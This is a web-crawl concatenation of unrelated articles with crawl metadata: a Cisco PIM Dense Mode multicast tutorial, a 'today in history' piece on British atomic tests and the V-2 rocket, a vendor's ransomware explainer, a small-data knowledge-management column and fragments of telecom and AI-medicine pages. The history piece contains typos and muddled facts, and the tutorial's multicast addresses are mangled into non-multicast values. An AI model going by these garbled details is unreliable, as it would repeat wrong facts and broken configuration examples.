As one of the most viewed sources on the internet and around the globe, Wikipedia has the power to hold its COVID-19 information up high for ‘those in the back’, so to speak. Coupled with the reach, resources, and expertise of the WHO, this collaboration could make a significant difference in protecting the vulnerable in the coming years.
The world of foldable phones keeps welcoming more additions to its roster. And it makes sense. The foldable phones are selling well even with their pricy asking point. Huawei’s latest foldable is the Huawei P50 Pocket. While it does many things right, it also has its shortcomings. We will take a deeper look at it. […]
Stay tuned with our weekly newsletter on all telecom and tech related news.
© Copyright 2022, All Rights Reserved
|
<urn:uuid:6ff40989-0073-40b8-9db2-7c97a56c7a03>
|
CC-MAIN-2022-40
|
https://insidetelecom.com/the-latest-covid-19-information-hub/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.43/warc/CC-MAIN-20220928020513-20220928050513-00447.warc.gz
|
en
| 0.918312 | 519 | 2.90625 | 3 |
This article continues the series on IP Multicast. We’ll take a look at how basic IP multicast works. We’ll then look at how PIM Dense Mode (PIM-DM) operates, how to configure it, and how to troubleshoot it. This should warm us up before taking on the slightly more complex and more scalable PIM Sparse Mode in a later article.
The initial multicast article contains links to the key IETF working groups at its end. It can be found at The Protocols of IP Multicast.
Understanding IP Multicast Forwarding
The purpose of a multicast routing protocol is to allow routers to work together to efficiently deliver copies of multicast packets to interested receivers. In the process of doing this, the multicast routing protocol probably also provides a mechanism for neighbors to discover and track neighboring routers also using the multicast routing protocol.
As we saw in the last article, those computers interested in receiving a multicast packet stream use IGMP to notify adjacent router(s). The routers then use the multicast protocol to arrange for a copy of the multicast packet stream to be sent to them so they can forward it onto the LAN containing the receiver. We made no mention of what happens at the source end of the packet stream. In IP multicast, there is no protocol for the source to communicate or register or notify the routers. The source just starts sending IP multicast packets, and it is up to the neighboring router(s) to do the right thing. (What the “right thing” happens to be depends on the multicast routing protocol).
The following picture shows a source sending a multicast packet in red, and downstream routers duplicating the packet and flooding it to other routers and ultimately all LAN segments. As we’ll see shortly, this is the initial (and periodic) behavior of Cisco’s Protocol Independent Multicast (PIM) multicast routing protocol, when acting in Dense Mode.
Notice in the above picture that the blue arrows forward multicast packet copies in an organized way. There may be two copies of each packet coming into some of the routers or LAN segments. But the routers do not forward packets “backwards”. This is a good thing: think about what might happen if router E were to forward a copy of the packet it received from C to router B. Would B then forward the packet to A, which might forward it to C, and so on, in a forwarding loop? This would be a sort of Layer 3 equivalent of what happens at Layer 2 when Spanning Tree is disabled in a loop topology: a good way to waste a lot of bandwidth and router capacity.
To prevent multicast forwarding loops, IP multicast always performs an RPF check, which we’ll talk about shortly.
In addition to the RPF check, multicast routing protocols such as PIM may also work to prevent inefficiency. For example, router E in the picture does not need to receive two copies of each multicast packet (one from B, one from C).
The multicast routing protocol determines which interfaces to send copies out (or not send copies out). As the above picture suggests, multicast forwarding occurs along logical trees, branching paths through the network. All the multicast forwarding information is stored in the multicast state table, which some people call the multicast routing table. This information can be viewed with the very useful command, show ip mroute. Let’s take a brief look at sample output from the show ip mroute command (with PIM Dense Mode running).
Router# show ip mroute 220.127.116.11 IP Multicast Routing Table Flags: D - Dense, S - Sparse, C - Connected, L - Local, P - Pruned R - RP-bit set, F - Register flag, T - SPT-bit set Timers: Uptime/Expires Interface state: Interface, Next-Hop, State/Mode (*, 18.104.22.168), uptime 0:57:31, expires 0:02:59, RP is 0.0.0.0, flags: DC Incoming interface: Null, RPF neighbor 0.0.0.0 Outgoing interface list: Ethernet0, Forward/Dense, 0:57:31/0:02:52 FastEthernet1, Forward/Dense, 0:56:55/0:01:28 FastEthernet2, Forward/Dense, 0:56:45/0:01:22 (172.16.16.1/32, 22.214.171.124), uptime 20:20:00, expires 0:02:55, flags: C Incoming interface: FastEthernet1, RPF neighbor 10.20.30.1 Outgoing interface list: Ethernet0, Forward/Dense, 20:20:00/0:02:52
To understand this, note that addresses starting with 224-239 are IP multicast addresses or groups. (The group refers to the group of receivers for that multicast destination address).
The entry starting with (*, 126.96.36.199) is a shared multicast tree entry, sometimes referred to as a (*, G) entry. (G here is just 188.8.131.52). PIM-DM doesn’t use these for packet forwarding, but does list interfaces with a role in multicast (known IGMP receiver or PIM neighbor) as outgoing interfaces under such entries.
The entry starting with (172.16.16.1, 184.108.40.206) is referred to as an (S, G) entry. S is source, G is group. If you prefer, think of this as source and destination in the IP header (since that’s where they actually appear in the packets). This entry is a source-specific multicast tree for a particular multicast group. There will generally be one such entry for each source and group. Note that the unicast routing next hop shows up as the RPF neighbor, and the incoming interface is the RPF interface, the interface used by unicast routing towards the source 172.16.16.1. The outgoing interface list shows that any packet from 172.16.16.1 with destination 220.127.116.11 received on FastEthernet1 will be copied out Ethernet0.
You can draw the multicast forwarding tree for a particular (S, G) for troubleshooting purposes. To do this, run the show ip mroute command on each router. Take a copy of your network map and draw an outbound arrow for each interface in the outgoing interface list (“OIL” or “OILIST”). You’ll end up with a diagram somewhat like the above picture.
State flags you might see in PIM-DM show ip mroute output:
- D = Dense Mode. Appears on (*, G) entries only. Group is operating in Dense mode.
- C = Directly Connected Host (IGMP!)
- L = Local (Router is configured to be a member of the multicast group).
- P = Pruned (All OILIST interfaces set to Prune). The router generally send Prune to its RPF neighbor when this occurs.
- T = Forwarding via Shortest Path Tree (SPT), indicates at least one packet received / forwarded.
- J = Join SPT. Always on in (*,G) entry in PIM-DM, doesn’t mean much.
What is the RPF Check, and Why?
IP multicast forwarding always performs an RPF check. RPF stands for Reverse Path Forwarding. The goal of the RPF check is to try to prevent a multicast packet forwarding loop in a simple way. For each multicast stream, the multicast router checks the source address, what device sent the multicast. It then looks the sender up in the unicast routing table, and determines the interface it would use to send unicast packets to the multicast source. That interface is the RPF interface, the one on which the router “expects” to receive multicasts. Think of it as the “officially approved” interface for receiving multicasts from that particular source. The router stores the RPF interface as part of the multicast state information for that particular source and that particular multicast destination (group).
When a multicast packet is received by the router, the router tracks which interface the packet came in. If the packet is the first packet from a new source, the RPF interface is determined and stored in the mroute table, as just discussed. Otherwise, the router looks up the source and multicast group in the mroute table. If the packet was received on the RPF interface, the packet is copied and forwarded on each outgoing interface listed in the mroute table. If the packet was received on a non-RPF interface, it is discarded. If the router were a person, this would be the equivalent of “What’s that person sending me this for? They must be confused, I’ll ignore what they just sent me.”
The router also does not send a copy of a packet back out the interface it came in (the RPF interface). In other words, even if the neighboring router on the RPF interface somehow were to request to be sent copies of a multicast stream, the router will not add the RPF interface to the list of outbound interfaces which receive copies of the multicast stream. This protects against any sort of protocol error getting two neighbors into a tight multicast forwarding loop.
Router E is also probably ignoring one of the two packet streams, based on whether B or C is connected to the RPF interface. Even with equal cost routes, normally just one interface is chosen as the RPF interface. So if you have two links connecting two routers, only one will typically be used for multicast from any one source subnet.
See however the command ip multicast multipath (new in Cisco IOS Version 12.0(8) T, 12.0(5) S). With this command, used properly, there can be load balancing for different sources for a particular multicast group. Since this is per-source and not per-stream, it really becomes more like load splitting. It may not end up being very balanced.
Load balancing traffic for one packet stream (one source and group) over two links between two routers can also be done using GRE tunnels between loopback interfaces, although I might worry about performance implications of doing this with a high bandwidth flow.
By the way, this also tells us how to direct IP multicast over links of our choosing. We control where multicast traffic goes by controlling the RPF check. If a router doesn’t learn routes back to a multicast source on some interface, then that interface will not be the RPF interface. So with distance vector protocols and “route starvation” (not advertising a route to a neighbor), we can steer or direct multicast.
We’ll see later that any PIM grafts or joins are sent out the RPF interface, back towards the source (or RP, in PIM Sparse Mode). By controlling where this activity takes place, we control which links the multicast is forwarded on. Static mroute entries (static routes back to the source for multicast RPF check purposes) are another way of directing multicast traffic. If / when we talk about Multicast MBGP (Multiprotocol BGP for Multicast), we’ll see that MBGP also provides us with a way to direct or control the links used by multicast traffic. Also note that if the RPF interface does not have IP multicast enabled, then in effect the router is expecting packets where it will not receive them. The RPF interface should always be one where IP multicast is enabled.
PIM Dense Mode — Overview
Protocol Independent Multicast has two modes, Dense Mode and Sparse Mode. This article only has space to cover the former. We’ll get to PIM-SM in the next article.
PIM Dense Mode (PIM-DM) uses a fairly simple approach to handle IP multicast routing. The basic assumption behind PIM-DM is that the multicast packet stream has receivers at most locations. An example of this might be a company presentation by the CEO or President of a company. By way of contrast, PIM Sparse Mode (PIM-SM) assumes relatively fewer receivers. An example would be the initial orientation video for new employees.
This difference shows up in the initial behavior and mechanisms of the two protocols. PIM-SM only sends multicasts when requested to do so. Whereas PIM-DM starts by flooding the multicast traffic, and then stopping it each link where it is not needed, using a Prune message. I think of the Prune message as one router telling another “we don’t need that multicast over here right now”.
In older Cisco IOS releases, PIM-DM would re-flood all the multicast traffic every 3 minutes. This is fine for low volume multicast, but not higher bandwidth multicast packet streams. More recent Cisco IOS versions support a new feature called PIM Dense Mode State Refresh, since 12.1(5)T. This feature uses a PIM state refresh messages to refresh the Prune state on outgoing interfaces. Another benefit is that topology changes are recognized more quickly. By default, the PIM state refresh messages are sent every 60 seconds.
Consider routers E and F in the above picture. When two PIM-DM routers connect to a LAN, they will see the multicast packets from each other. One should forward packets to the LAN, and the other not. They both send Assert messages. Best routing metric wins, with higher IP address as a tie-breaker. If they are using different routing protocols, a weighted routing metric scheme, somewhat like administrative distance, settles which router is to be the Forwarder (forwarding the multicast packets onto the LAN). The Forwarder may be silenced by a Prune from a downstream router with no receivers, if there are also no receivers on the LAN segment. Downstream routers may have to adjust their RPF neighbor, to reflect the winner of the Assert process.
To repeat that in full detail: when multicast traffic is received on a non-RPF interface, a Prune message is sent, provided the interface is point-to-point. These Prune messages are rate-limited, to make sure the volume of them (potentially, one per multicast received) doesn’t cause further problems.
If the non-RPF interface is a LAN, an Assert message is sent. Non-Forwarder routers then send a Prune on their RPF interface if they don’t need the multicast stream. Only one such Prune is sent, at the time of the transition to having no interfaces in the Outgoing Interface List (OILIST). The LAN Prune receiver delays acting on it for 3 seconds, so that if another LAN router still needs the multicast stream, it can send a PIM Join message to counteract (cancel) the Prune. (“Yo, that router doesn’t need it, but I still do!”)
Suppose a router has Pruned, and some time later a receiver requests the multicast stream with an IGMP message. The router then sends a Graft message. In effect, “hey, I need that multicast stream over here now”.
The following picture illustrates this, admittedly in somewhat compressed form.
Explanation of the picture:
(1), perhaps the router E choses B as its RPF neighbor, based on unicast routing back to the source. Then E receives a multicast packet on the point-to-point interface from C. It sends a rate-limited Prune to C.
(2), the routers E and F on the LAN exchange Assert packets, when E or F sees the multicast forwarded by the other of the two. Suppose E wins, based on unicast routing metric or address. Then F knows not to forward multicasts on the LAN. Note that G and H are not involved, since the Ethernet is their RPF interface.
(3), suppose router G has no receivers downstream. It can then send a LAN Prune to the Forwarder for the LAN, router E.
(4), if router H has local or downstream receiver(s), it counters this with a LAN Join.
(5), suppose router D had no downstream or local receivers and sent a Prune to B. Suppose sometime later on of the PC’s to its right sends it an IGMP message for the same multicast group. Router D can then send a PIM Graft to B, asking B to resume sending it the specified multicast group.
PIM Protocol and Packet Types
PIM is a full routing protocol, with various kinds of messages. I’m not about to drone on and on about the different messages. But I do think it’s worth taking a brief look, since it tells us a little about the protocol.
PIM uses Hello messages to discover neighbors and form adjacencies. The Hello is sent to the All-PIM-Routers local multicast address, 18.104.22.168, every 30 seconds (PIMv1 uses AllRouters, 22.214.171.124). Each LAN has a PIM Designated Router (DR), used in PIM Sparse Mode. It is also the IGMPv1 Querier: the highest IP address on the LAN. The show ip pim neighbor command shows neighbors and adjacency and timer information.
Clarification added 12/11/2004: IGMP querier and Designated Router are the two roles in question. See here.
In IGMP version 1,”The DR is responsible for the following tasks:
- Sending PIM register and PIM join and prune messages toward the RP to inform it about host group membership.
- Sending IGMP host-query messages.”
In IGMP version 2, they are decoupled. The IGMP querier is elected by lowest IP on the LAN. PIM selects the DR by highest IP on the LAN, to forward multicasts to the LAN. (This offloads work).
PIM also has a Join/Prune message, used as described above. There are also Graft and Graft ACK messages, which tells us that Graft is done reliably (unlike the real world?).
And there is the PIM Assert message.
PIM-SM has 3 more message types: Register, Register-Stop, and RP-Reachability (not in PIMv2).
Configuring PIM Dense Mode
Configuring PIM-DM is downright easy compared to all the above.
Globally, enable multicast routing with the command:
Then on each interface you wish to participate in multicasting, enable IP multicast and PIM with the interface command:
ip pim dense-mode
Actually, it is better practice to configure sparse-dense mode:
ip pim sparse-dense-mode
The reason is that this allows you to simply migrate some or all multicast groups to Sparse Mode, by letting the router know about a Rendezvous Point. And you can even do this without reconfiguring a lot of routers or router interfaces.
You can configure stub networks for simple IP multicast. The idea is to not run PIM to stub parts of the network, like small remote sites, for simplicity. This is a particularly good idea with routers that are not under your control: you don’t want them sharing multicast routing with your routers. It also eliminates PIM-DM flooding to such routers (with older Cisco IOS releases).
To configure stub multicast, configure
ip igmp helper-address a.b.c.d
on any stub router LAN interfaces with potential multicast receivers. The address a.b.c.d is the address of the central PIM-speaking router. On the central router, you configure a filter to tune out any PIM messages the stub neighbor might send, with:
ip pim neighbor-filter access-list
See also the Command Guide at the URL:
There are several show commands to help troubleshoot IP multicast. The ones I like best:
- show ip mroute
- show ip pim interface
- show ip pim neighbor
- show ip rpf
Since space is tight, I’ll refer you to the Command Reference for examples.
One troubleshooting note: if you do have high bandwidth multicast in your network, make sure you use the Prune State Refresh in the newer Cisco IOS releases if you’re using sparse-dense mode. I worry about routers “forgetting” they have a RP and reverting to Dense Mode, with periodic flooding. This might be a rare accidental occurrence, but it could really ruin your morning! You may also wish to consider RP robustness techniques as well, a topic for our later PIM-SM or Rendezvous Point article.
The recommended book for a lot of multicast topics: Developing IP Multicast Networks: The Definitive Guide to Designing and Deploying CISCO IP Multicast Networks, Beau Williamson.
Another extremely good Cisco multicast link can be found here.
Next article: scaling with PIM Sparse Mode.
|
<urn:uuid:5dfe94f1-5ce1-41a5-b508-9ae04991b901>
|
CC-MAIN-2022-40
|
https://netcraftsmen.com/pim-dense-mode/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.43/warc/CC-MAIN-20220928020513-20220928050513-00447.warc.gz
|
en
| 0.909576 | 4,571 | 3.390625 | 3 |
History is a dynamic intersection of truths, biases, and expectations, not just what happened in the past. The variety and complexity inherent in the study of history are demonstrated by a look at two very different historians, the Roman Tacitus, and the Byzantine Procopius. At least three different methods of accessing history are involved in history: it can be recalled or retrieved or even invented. Everyone is flawed in some way. For example, the complete and unvarnished truth about history is exposed by no historian or historical source, so memory is a fallible guide. Often, without context, no evidence brought to light by archaeology or historical research is complete, and the value of recovered historical data is often difficult to assess. Also, several alleged ‘histories’ can be shown to have been invented; at the same time, though, these fabrications also tell us a lot about the values and dreams of a culture. All in all, the best tales are the best tales.
Let’s discuss a few major Historical events in Today’s History.
1953: Britain tests its first atomic bomb at a group of uninhabited islands off Western Australia.
A group of islands is situated on the Pilbara coast of northwest Australia, about 140 kilometers from the Montebello Islands. There are some 170 other islands, including another 30 in the archipelago and also on the two main islands, Hermite Island and Trimouille Island. Most pearl fishing was carried out off the islands before World War II.
The first British nuclear weapons were tested on the Montebello Islands on 3 October 1952. The object of ‘Operation Hurricane’ was to evaluate the effects of a bomb smuggled into shipping 350 m offshore of Trimouille Island-which was of particular significance at the time. Within HMS Plym, a frigate of 1,370-ton Class River that was grounded in 12m of water, the plutonium implosion bomb detonated. The ensuing explosion left a crater on the seafloor 6 meters deep with a circumference of 300 meters.
1942: Nazi Germany initiates the Space Age, launching the first rocket to reach outer space.
In general. The Space Age is considered to be starting with the Soviet Union’s first artificial satellite in 1957. In reality, the Space Age started over ten years earlier with the construction of a Nazi Germany military test facility, where the first outer rocket was launched.
In 1936, in the northeast of Usedom, Nazi Germany started to develop a technical facility in Peenemunde. Foreign workers, prisoners of war, concentration camp prisoners, and forced labor were mainly involved in construction. It is considered the world’s first major testing center, the Peenemund Military Test site, under the direction of physicist Wernher von Braun, was responsible for creating the “wonder arms” cocket. The Aggregate 4 cocket (A4), Nazi propaganda, was known as the “Vergeltungswaffe 2”.
On 3rd October 1942, the first missile was launched. It was the first ballistic missile to enter outdoor space and flew about 90 miles into the atmosphere. The rocket was able to hold explosives four times sound speed. Today it is considered the blueprint for both new military and civil rockets the V-2 was used since September 1944 for attacks on Allied objectives in Belgium, Great Britain, and France. Even if it was directly responsible for the deaths of thousands of workers during their growth, more workers were killed, with estimates estimating that as many as 20,000 people were killed during production and testing.
After World War II ended, von Braun and around 500 of his best scientists were surrendered to the USA, which sought to recruit engineers from the facility to help develop space technology. The technology which von Braun developed led to his design of the Saturn rocket boosters which were eventually employed to put the first man on the Moon. The former test site in Germany is now the location of the Peenemünde Historical Technical Museum which, in 2002, was awarded the Coventry Cross of Nails for its contribution to reconciliation and world peace.
|
<urn:uuid:c5eac7b8-995f-4928-a93a-3ddf9a346c11>
|
CC-MAIN-2022-40
|
https://areflect.com/2020/10/03/today-in-history-october-3/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.22/warc/CC-MAIN-20220930181143-20220930211143-00447.warc.gz
|
en
| 0.965805 | 860 | 3.40625 | 3 |
What is ransomware? How can you protect against Ransomware?
The word “ransomware” comes from the English language and contains the term “ransom”, which translated means “held hostage for money”. Ransomware is a malicious program for computers, which ensures that the computer is locked for the user, and can only be unlocked again by paying a ransom. How exactly does ransomware work? How big is the danger of ransomware? How you can protect yourself against ransomware? We will explain in this article!
What is ransomware?
Ransomware is a computer virus that is installed unnoticed on the PC of a stranger. The difference of ransomware to normal malware, is that ransomware comes into direct contact with the user of the affected system. The malware encrypts either the files or the entire computer. The hacker has control over the computer, and demands a ransom. As long as the victim does not pay the ransom, the device stays encrypted.
If the infected device is in a network, such as in a company, the malware can spread to the entire network and encrypt all devices on that network. This can shut down entire companies, hospitals and universities.
An example of a ransomware attack – Emotet
Emotet is one of the best known ransomware variations and even made it into the daily media coverage. Our Security Lab has taken a closer look at Emotet and examined it. In a detailed knowledge base page you will learn exactly how Emotet works:
What is a Cryptolocker / Cryptotrojan?
A cryptolocker is part of the ransomware family. The goal is to get a ransom from the hacked victim. The cryptolocker infects the user’s documents and forces him to pay a ransom.
Ransomware attacks by cryptotrojans can have serious (financial) consequences for companies. Cryptotrojans have even threatened the existence of some companies, and driven them into bankruptcy in some cases. It is the horror scenario par excellence: An employee of a company catches a cryptotrojan on his work computer. It does not take long for the malware to spread across the entire company network.
How big is the danger of ransomware?
The danger of ransomware is greater than one might think. Companies in particular should be on guard against infected emails. By 2018, cybercriminals had already stolen 8 billion euros. A considerable sum, but in 2019 even more was hijacked: The damage generated in 2019 has more than tripled compared to the previous year, of approximately 24 billion euros.
What is the reason for this rapid increase in successful ransomware attacks? Hackers have found the right niche. Sophisticated techniques and a little information about a company’s employees (social engineering) enable hackers to infect the IT infrastructure with a simple malicious email. Hospitals have been the most frequent victims of encryption attacks.
How does ransomware work?
It usually starts with a classic phishing email that serves as bait to download an infected file. In most cases, the infection with the ransomware happens by an attempted PDF, DOC or XLS file.
By opening the malicious file, the criminal has crossed the most significant hurdle. The installation on the respective system takes place. It should be mentioned that the installation can run independently of the activation of the ransomware. The ransomware attack can thus be prepared in advance, but for example can be started at a later time.
As soon as the ransomware is activated, the actual damage starts: the encryption process begins. Individual files on one system or even several systems within a company network can be encrypted. From now on, the user no longer has access to certain files or his entire computer. He has completely lost his admin rights. The control is in the hands of the hacker.
Once everything is encrypted, a notification appears on the victim’s screen. Here the hacker demands a ransom to remove the ransomware. Once this process is complete, the attackers only have to wait for the victim to pay the ransom. Linking the ransom demand to a deadline is an effective way for cybercriminals to increase the pressure on the victims. If the owners of the systems have not made a payment by the deadline, either the ransom demand will increase or the process of deleting data will begin.
Ransomware attacks can cause great damage, especially to companies. Experts and authorities usually advise against paying a ransom. Often the victims have no choice but to hope for the good-naturedness of the hackers after the payment. Often, the decryption after the payment of the ransom is not carried out.
Protection from Ransomware
To protect against ransomware, companies should be proactive and develop a cybersecurity plan against malware. Since ransomware is very difficult to detect and fight, different protection mechanisms should be used. The most important protection is the training and sensitization of employees. Only those who know that ransomware exists and how it proceeds can detect such attacks.
Since the email inbox is one of the classic entry points for malware, a good spam filter should block or at least quarantine all executable attachments, zip files and MS Office document macros. Hornetsecurity offers a solution and filters out these dangers with the spam and virus filter before the mail can be delivered. The constant further development of the filters ensures that the increasingly professional means and methods of attack are counteracted.
With one of the highest detection rates on the market (99.99%), 18 different virus scanners check email traffic. A contaminated attachment, which has been packed several times and made unrecognizable, is recognized by the virus scanner of Hornetsecurity and categorized as spam.
365 Threat Monitor goes one step further and reliably detects ransomware attacks as well as various types of malware that are still unknown. Hornetsecurity Advanced Threat Protection (ATP) offers solutions on a broad basis. These include URL rewriting and URL scanning.
If an attack is successful, it is important to have up-to-date backups available. In this way an older version without infection can be uploaded. This keeps data loss as low as possible. The backup can be done manually or automatically. A cloud solution for companies would be a great possibility for data backup.
For ransomware attacks the email is primarily used. Well camouflaged, emails get to the computer of the employee in the target company as PDF, EXE or JPEG files. The display of file extensions is deactivated by default in most email clients, which is why the user usually cannot recognize the format of the file at first glance.
Unintentionally, the infected files are opened and the ransomware is executed. Therefore, it is important that you enable the viewing of file extensions in your email client settings.
Closing vulnerabilities is also very important. Microsoft’s Remote Desktop protocol is often used as a vulnerability. This feature allows ransomware to spread within the local network in individual cases. This way the malware distributes itself in the network within a very short time. Updating the systems is also absolutely necessary. The older the software, the more entry points are known and available. If you are still using Windows 7 or even Windows XP today, you should not be surprised if your computer is infected and encrypted. So WannaCry used a gap in outdated Windows systems (EternalBlue). It was simply ignored by many companies. Updates or patches were not applied. This resulted in a large number of successful ransomware attacks on companies.
Are there ransomware scanners?
If the ransomware is already on the computer, it is usually already too late. If the ransomware has not yet been activated, an up-to-date anti-virus program will help. However, the most sensible solutions are those that detect ransomware before it reaches the computer. This is also where classic virus scanners, such as GDATA, which take action against all types of malware, help. However, if it is a question of protection against infected emails, an extended spam filter should be used.
Here, for example, an anti-ransomware scanner such as the cloud solution Advanced Threat Protection from Hornetsecurity can help. The service protects against attacks with ransomware such as Locky, Tesla or Petya, filters out phishing mails and fends off so-called blended threats. To achieve this, Hornetsecurity ATP uses various detection mechanisms: In addition to a sandbox, URL rewriting and URL scanning are also used. Freezing, i.e. the “freezing” of suspicious e-mails, is also part of Hornetsecurity ATP.
How to remove Ransomware?
Once the ransomware is on the computer and has infected it, there is usually no good way out. Either you pay the ransom (the police advise against it) or you set up the computer new (with the hope of an up-to-date backup). For some ransomware attacks, however, there are decryption tools. Just visit the site https://www.nomoreransom.org/crypto-sheriff.php?lang=en for this. No More Ransom provides ransomware decryption for over 50 different ransomware types.
What types of ransomware exist?
There are basically two different types of ransomware. Crypto ransomware encrypts files so that the user has no access to them. Locker ransomware excludes the user from his computer so that he cannot access it.
There are also subtypes of these two variants. Scareware is fake software that finds errors and problems on the PC that do not exist. The software charges money to fix this problem. Scareware can also lock the computer (locker ransomware).
Doxware or also called Leakware extorts users with allegedly stolen data. Who does not pay, their data will be published, threatens the Leakware.
An example of a ransomware attack – Emotet
Emotet is one of the best known ransomware variations and even made it into the daily media coverage. Our Security Lab has taken a closer look at Emotet and examined it. In a detailed blog post you will learn exactly how Emotet works:
Risk of ransomware for companies
The danger for companies through ransomware is enormous. If a private computer is encrypted by ransomware this is annoying, but usually no reason for private insolvency. If a company computer is infected, this can lead to the companies bankruptcy. Often ransomware spreads throughout the entire network and infects all devices that are in this network. The result: entire companies can no longer operate. Files are lost, working time is lost, work cannot continue.
Which ransomware is in use in 2020?
It is early 2020, and the first ransomware wave is already in full swing. The daily reports on Greta Thunberg and Fridays for Future are now also being used by criminals. They are sending emails in the name of the young activist. The Hornetsecurity Security Lab has intercepted emails in which cyber criminals ask the recipients for support in a large demonstration in favour of climate protection. The time and address of the global strike can allegedly be found in the attached file. When the recipient opens the attachment, an encrypted document appears. The user is asked to activate the editing and content of the document. Following this instruction, a macro is executed which downloads the malicious malware.
Should I pay the ransom for a ransomware attack?
No, experts and investigating authorities advise against paying the ransom. Often the data is not decrypted despite payment and the computer is still not usable. Therefore, anti-ransomware solutions should rather be used and preventive measures should be taken so that paying ransom does not become an option in the first place.
Visit Our Knowledge Base
Did you like our contribution from the knowledge database on the subject of Ransomware? Then you get to the overview page of our knowledge database here. There you will learn more about topics such as DDoS Attacks, Crypto mining, Cryptolocker virus, phishing, brute force attacks, GoBD, cyber kill chain, it security and computer virus.
|
<urn:uuid:cd20820f-c388-4f84-bf32-b538aba7f906>
|
CC-MAIN-2022-40
|
https://www.hornetsecurity.com/us/knowledge-base/ransomware/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337244.17/warc/CC-MAIN-20221002021540-20221002051540-00447.warc.gz
|
en
| 0.945238 | 2,444 | 3.015625 | 3 |
Big opportunities in small data
With the world cranking out over two exabytes on a daily basis, it’s no wonder big data is all the rage. It’s a natural consequence of networked access to any and all types of data sources. And with the emergence of the Internet of Things (IoT), the volume is rapidly growing from exabytes to zettabytes.
Data analytics goes hand in hand with big data. Its goal is to more accurately predict what you’re likely to do next, so the things you need will be waiting for you precisely when you need them.
At some point down the road as the cloud becomes an inescapable part of our world, the matching of need and availability will become even more transparent and instantaneous. This will be enabled in part by a technology that’s quietly emerging on the other end of the spectrum, known as small data.
Big and small data differ not only with regard to volume, format and structure. Approaches to analyzing and acting on the two types are also markedly different. Let’s do a comparison and see where KM fits in.
The cosmos of big data
Big data uses open source platforms such as Hadoop, often in a peer-networked configuration, to store massive volumes of data. Tools like MapReduce extract the data, and an array of statistics software, pattern matching and machine learning algorithms are applied.
As a result, upward of trillions of data points are reduced, often into a simple mean and standard deviation or into various categorical representations, i.e., “buckets.” Rule sets are produced that generate recommendations aimed at specific segments of the population. By doing that, big data seeks to help organizations make better business decisions based on the aggregate behavioral tendencies of the population segments in each bucket.
But that approach has its drawbacks. The greater the reduction, the more context and individuality are lost. What might be an abnormal reading for some (such as a prolonged, low-grade fever) could be completely normal for others. Another drawback is as the number of rules for various conditions and circumstances grows, combinatorics makes the rule sets increasingly more difficult to maintain.
Perhaps the greatest shortfall is the lack of capacity for measuring unintended consequences. As is often the case in so-called “data-driven” decisions, the resulting damage may not be discovered until it’s too late.
On the other hand, there are many positive benefits to big data. If your home address is in the path of a severe storm, the entire supply network mobilizes to help you quickly stock up on whatever emergency supplies you might need.
The law of large numbers also comes into play. Direct marketers are delighted if data analytics improves their response rates by even half a percent. The same goes for politics. If you can garner support from 25 percent of one group, 15 percent of another and 11 percent of the rest, congratulations—you’ve won a majority of the vote!
The microworld of small data
Small data also uses the power of peer-networked computing. In this case, the goal is to create and maintain millions, even billions of much smaller, highly individualized buckets.
The emerging array of small data analysis tools consists of graph or other NoSQL databases, personal ontologies, state and goal spaces and generative rule sets. Instead of maintaining large data repositories, small data uses those tools to build a computationally based model of the state of an individual (physical health, financial health, education, etc.) as the primary record. It then uses a stream of individualized data inputs to update and adjust the model.
At that point, unlike in big data, input data are discarded. Then the state changes of the model are analyzed, focusing on aspects such as learning behaviors, lifestyle habits, etc. Instead of attempting to identify and act on mass-market trends, rules generate recommendations that focus on influencing individual behaviors at the deep structure level (e.g., memory engrams). Over time, the rules are adjusted as well. Once in place, small data rule sets are more stable and less complex than those typically associated with big data.
All of that dramatically reduces storage requirements while producing resources that can be more easily de-individualized and shared. That translates into a different and much more manageable set of governance policies and responsibilities.
Opportunities for KM
For decades, we’ve been promoting the notion of mass customization. From building a playlist to configuring your own tablet/laptop, it’s become commonplace in our consumer-based society. But we haven’t even scratched the surface of what small data can do. Here are three simple steps you can take:
- Look for any market niche in which the current one-size-fits-all model might be replaced with something built for “you and only you.”
- Replace the whole notion of databases and analytics with personal ontologies that monitor changes in the state of the user. Note that this can be applied to devices and systems as well. Complex ontologies may not always be necessary. In many circumstances, a simple concept space or topic map will suffice.
- Generate and maintain a set of rules for (a) analyzing the current state of the person, device or system and (b) recommending behavioral changes aimed at advancing toward the goal state.
For example, in the area of personal health and fitness, every person has a unique physiology, the attributes of which are represented in the model. Vital signs and other data are continuously streamed from devices such as Fitbit, along with records that may include food and liquid intake, medicines, air quality, periods of rest and activity, etc. All can be used to update the state of the model and generate recommendations to correct negative tendencies and reinforce positive behaviors.
The same principles apply to education, in which every person has unique mental models and learning styles. Similarly, consumers can be guided to help choose and use products more efficiently and effectively.
Action to take
Look for anything resembling a “one-size-fits-all” approach, or that lumps customers, products and services into groups or categories. Rather than attempting to pick and choose among groups, or worse yet “playing the averages,” put your brain trust to work at designing new business models that create the best, most unique experience possible for each individual customer.
Don’t hesitate to consider complex systems like the human physiology, the environment or a nation’s economy. For these, think state, not data.
Big data has its place. But by obsessing over data we’ve missed the true essence of knowledge representation and how we might influence behaviors through deep structure modeling. The added benefit is that this can be accomplished within an extremely small digital footprint.
In the age of “black swans,” where dramatic changes can appear overnight, your best bet may very well be to spread your risk across as many unique signatures as possible. Small data may be the disruptive technology you’re looking for to propel you to the forefront of the next economic wave.
Companies and Suppliers Mentioned
|
<urn:uuid:6f73fdcb-07dc-4ea3-bf7e-9e92655ce323>
|
CC-MAIN-2022-40
|
https://www.kmworld.com/Articles/Column/The-Future-of-the-Future/Big-opportunities-in-small-data-109953.aspx
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337244.17/warc/CC-MAIN-20221002021540-20221002051540-00447.warc.gz
|
en
| 0.935759 | 1,477 | 2.546875 | 3 |
Welcome to TechTalks’ AI book reviews, a series of posts that explore the latest literature on AI. This post is the first part of a two-part interview with Dr. Eric Topol about the impact of artificial intelligence on health care and medicine.
In the last part of our interview with Dr. Eric Topol, we discussed how artificial intelligence algorithms can return the gift of time to doctors and help them have more human interactions with their patients. This is a subject that Dr. Topol discusses early on in his latest book “Deep Medicine: How Artificial Intelligence Can Make Healthcare Human Again.”
